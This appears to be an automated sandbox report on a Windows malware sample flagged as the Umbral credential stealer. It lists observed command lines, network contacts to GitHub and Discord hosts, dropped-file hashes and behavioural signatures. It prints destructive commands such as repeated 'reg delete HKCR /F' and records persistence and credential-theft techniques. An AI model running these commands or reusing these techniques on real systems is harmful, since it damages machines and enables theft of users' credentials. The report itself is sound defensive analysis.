C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26662.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\26662.vbs

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\26662.vbs

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\26662.vbs

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\26662.vbs

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\26662.vbs

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\26662.vbs

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\26662.vbs

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\26662.vbs

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 image.noelshack.com udp
US 35.227.215.6:443 image.noelshack.com tcp
US 35.227.215.6:443 image.noelshack.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.71:80 crl.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\A1FA.tmp\A1FB.tmp\A1FC.bat

MD5 0a45f9a236bbcd265c0c42f31a98b97f
SHA1 c959b0487c1ab6ed111bee3d1f80bcc3032125a4
SHA256 38e4173ae8927a3bea9499ab2b9141d8f42f39383478633b0a4b98c0c661d0ff
SHA512 2935422f584afd8fde06d8838621c94205aa2ae67397b1d3ed3cb2e4d80d67e53d84cef2eaae4d3ea3c4dfc5e9282d712aab458dcd29660f9ae1215258fa1c72

C:\Users\Admin\AppData\Local\Temp\9503.vbs

MD5 135594160762ab9dd80794d7b34ab32a
SHA1 638fef88bbb5d310c51eda07ca10918a482ad3ac
SHA256 531eef292dba871300a5b31d9601bab2b8c03be17cc0aa28e216f82a5df01fa0
SHA512 19a8b0024abb6e22103aaf8654619ee803cb8ae2bfd21d6bb7c648a4dfb1a06936144d308cc3d0ebdd86d38b87434d2e3a152f541153d42d03b4ad767b72b54d

C:\Users\Admin\AppData\Local\Temp\14339.vbs

MD5 93e179454db6fe9ac81112193de37cde
SHA1 4752aec95d506cac3ed9c61f0fbbd9cf6bd0cde9
SHA256 8286f8a1d4cceae4ece0de6082109286f17c1234ee09e453ac9507185068c7cc
SHA512 a38411dd6eb30050e6100bd20e79e8f4d650c1a4ad646516370f603a28900dfc424292f83cd7b49b1296bf7b25ce6ce907ef8dee964ded2e6b79475a6741f207

C:\Users\Admin\AppData\Local\Temp\25728.vbs

MD5 3a7e0a94fa88dccd40d9b76b37d06db1
SHA1 d7604ddb660898ce3b1343aa712cf5926bc68bda
SHA256 368a1589e414e50d554cf0d871bd49b11f9cd9f189876c86a5caef92d158e6a4
SHA512 19b8377a708301fb719e43433b9c0a592346ea94206870e3ba2c77f901b17598dd977fd711e591b5d0fc46982ed83e62cfbbe678eabe43de494bdde176c89fcb

C:\Users\Admin\AppData\Local\Temp\25595.vbs

MD5 aabbe725da9751315bbeeda4ef58d816
SHA1 476c78912d61e790a793c8e6606825f2b169947c
SHA256 0422247afae1a1556e7832c45f4f1913a61cbace2be53aad58967ea9e6315360
SHA512 0e1a523c947013a1a23574d125294270cb8c6b8e4fd97630f7c35122a33b9d95e7a073cbe23f0ed3f78246dd8b2db2c4401e994eace3b9e3bdbe696708b887dd

C:\Users\Admin\AppData\Local\Temp\26662.vbs

MD5 d999ff5265bcd3fe9c67df5139e96328
SHA1 27a4aa58d8f1a1bd8f1bb55f4d732fc1955d21d6
SHA256 43c5cbd8df94b91fe902968d7bae0747aaf09b074b1ec5b81420af771c89fc5a
SHA512 6aabefbb540b504c00b7710b989f8ebc981e546f25e351771d8951eaa95bc0d08436a67845da2d0b37cce9181d153f29fccb9f7ff1ee31ac9a2a1c46b2abed83

C:\Users\Admin\AppData\Local\Temp\3416.vbs

MD5 523092d53a06f5b46778a0cd7c01d0fb
SHA1 221a8244271afdbe7ce105aaf189f1dbcfa57cdb
SHA256 09c2ca44b387ae9f69f0c001729c71313bae1d935ad99723a02ebfc0d2757c3e
SHA512 72015f1a996c56b6eab20590cdb2689124b87494a2ae8fb5fb0678dfb4bfd49046f66b23b0348a70942d74664e22051d5be5994de518414baa47ad81e77400eb

C:\Users\Admin\AppData\Local\Temp\31048.vbs

MD5 8a9b451fd9936100f33b576bb5ec3f02
SHA1 80c92544f733ddfb96dffa296293fb2835e85f2e
SHA256 4e17707eab52e31f035b13f68cce1aa2636680abde9de955fdf1495641660455
SHA512 b11700e12cc1c921dbf3cd017595dbb18befdb5a89e80295aa99ef8d5d23d3e689bf6b011927da27cb88ac93feea8fcef822b4b7acd92c26b32d5791773e911f

C:\Users\Admin\AppData\Local\Temp\26548.vbs

MD5 ec385d968eea8bf5abe4587305f39c89
SHA1 6509b0bb7cb6432a4c723f37dc7593116ad57c64
SHA256 98adff52d2e37335bc6fb9811a2759ab8bd86c6ca116818114a0ab88474a6f96
SHA512 d5ff6edac9fcc50a634ff949268004bc396a07bb472fce532166140964acbbb4195e99a02dae8a426e2c4f7a9c64a89d283361340615d89ef7465acbab5b26a8

C:\Users\Admin\AppData\Local\Temp\3627.bat

MD5 906f8567428cc89dd37e495430157ac1
SHA1 2003bd7cd1f7129f9e0507d54036e6b0d03a84bb
SHA256 c5f27562edee93ca92cca51ce79a403d44aae1d911e5367b3973ad1d02919d39
SHA512 0b767357c5c7dd67aa2add6fea4fc1f4e99eab1712bc241156f2f51837471ad912081ad2a3eafa2e691b9dd9a0eaf42b97ba8dd9fcf92a373acf31154f79c909

C:\Users\Admin\AppData\Local\Temp\CabDE40.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarDE72.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-09 00:56

Reported

2024-08-09 00:59

Platform

win10v2004-20240802-en

Max time kernel

101s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral

stealer umbral

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Umbral.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\melter.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\D: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A
